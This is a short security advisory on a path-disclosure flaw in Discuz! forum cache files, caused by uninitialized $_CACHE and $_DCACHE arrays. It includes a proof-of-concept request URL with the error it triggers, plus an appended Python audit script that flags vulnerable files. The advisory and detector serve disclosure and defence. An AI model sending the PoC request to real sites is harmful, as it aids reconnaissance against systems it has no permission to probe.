Discuz! path information disclosure bug

author: 80vul-A
team: http://www.80vul.com

I. Analysis

Files under directories such as \uc_client\data\cache\ and \forumdata\cache contain code like:

    $_CACHE['settings'] = array (
      'accessemail' => '',
      'censoremail' => '',
      'censorusername' => '',
      'dateformat' => 'y-n-j',
      'doublee' => '1',
      'nextnotetime' => '0',
      'timeoffset' => '28800',
    );

    $_DCACHE['settings'] = array (
      'accessemail' => '',
      'adminipaccess' => '',
      'admode' => '1',
      'archiverstatus' => '1',
      'attachbanperiods' => '',
      'attachimgpost' => '1',

The arrays $_DCACHE, $_CACHE and so on are not initialized. The dz security staff have in fact already considered this problem, for example in include\common.inc.php:

    $_DCOOKIE = $_DSESSION = $_DCACHE = $_DPLUGIN = $advlist = array();

The standalone Discuz! cache files, however, do not perform this initialization. When we submit ?_CACHE=1 or _DCACHE=2, an error is raised that exposes the path and other information.

II. Exploitation

PoC, for example:

    http://www.80vul.com/bbs/forumdata/cache/cache_usergroups.php?_DCACHE=1

    Notice: Array to string conversion in xxx\forumdata\cache\cache_usergroups.php on line 6

III. Patch [fix]

Wait for the official patch.
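Added example, not part of the original advisory and not Discuz! code: a Python audit that flags cache files which write to $_CACHE or $_DCACHE before the array is initialized and without a direct-access guard ahead of the write. The guard pattern (a defined() check followed by exit or die), the file names and the sample file contents are assumptions constructed for illustration.

```python
import re

CACHE_VARS = ("_CACHE", "_DCACHE")  # array names taken from the advisory
# Assumed guard idiom: if(!defined('SOME_CONSTANT')) exit(...) or die(...)
GUARD = re.compile(r"if\s*\(\s*!\s*defined\s*\([^)]*\)\s*\)\s*\{?\s*(exit|die)\b")

def first_write(src, name):
    """Offset of the first element write such as $_DCACHE['settings'] = ..."""
    m = re.search(r"\$" + name + r"\s*\[[^\]]*\]\s*=(?!=)", src)
    return m.start() if m else None

def initialized_before(src, name, pos):
    """True if $name = ... array(); (plain or chained) appears before pos."""
    init = re.compile(r"\$" + name + r"\s*=(?!=)[^;]*\barray\s*\(\s*\)\s*;")
    return init.search(src, 0, pos) is not None

def exposed_vars(src):
    """Cache arrays a request variable could pre-set before the first write."""
    found = []
    for name in CACHE_VARS:
        pos = first_write(src, name)
        if pos is None:
            continue
        if GUARD.search(src, 0, pos) or initialized_before(src, name, pos):
            continue
        found.append(name)
    return found

def audit(files):
    """Map each file name to its exposed arrays; clean files are omitted."""
    return {p: v for p, s in sorted(files.items()) if (v := exposed_vars(s))}

# Constructed samples modelled on the excerpts quoted in the advisory.
SAMPLES = {
    "cache_settings.php": "<?php\n$_DCACHE['settings'] = array (\n  'admode' => '1',\n);\n",
    "uc_settings.php": "<?php\n$_CACHE['settings'] = array (\n  'doublee' => '1',\n);\n",
    "initialized.php": "<?php\n$_DCOOKIE = $_DSESSION = $_DCACHE = array();\n"
                       "$_DCACHE['settings'] = array (\n  'admode' => '1',\n);\n",
    "guarded.php": "<?php\nif(!defined('IN_DISCUZ')) exit('Access Denied');\n"
                   "$_DCACHE['settings'] = array (\n  'admode' => '1',\n);\n",
}

if __name__ == "__main__":
    for path, names in audit(SAMPLES).items():
        print(path, "->", ", ".join("$" + n for n in names))
```

To audit a real installation, read each .php file under the cache directories named in the advisory into the dict passed to audit().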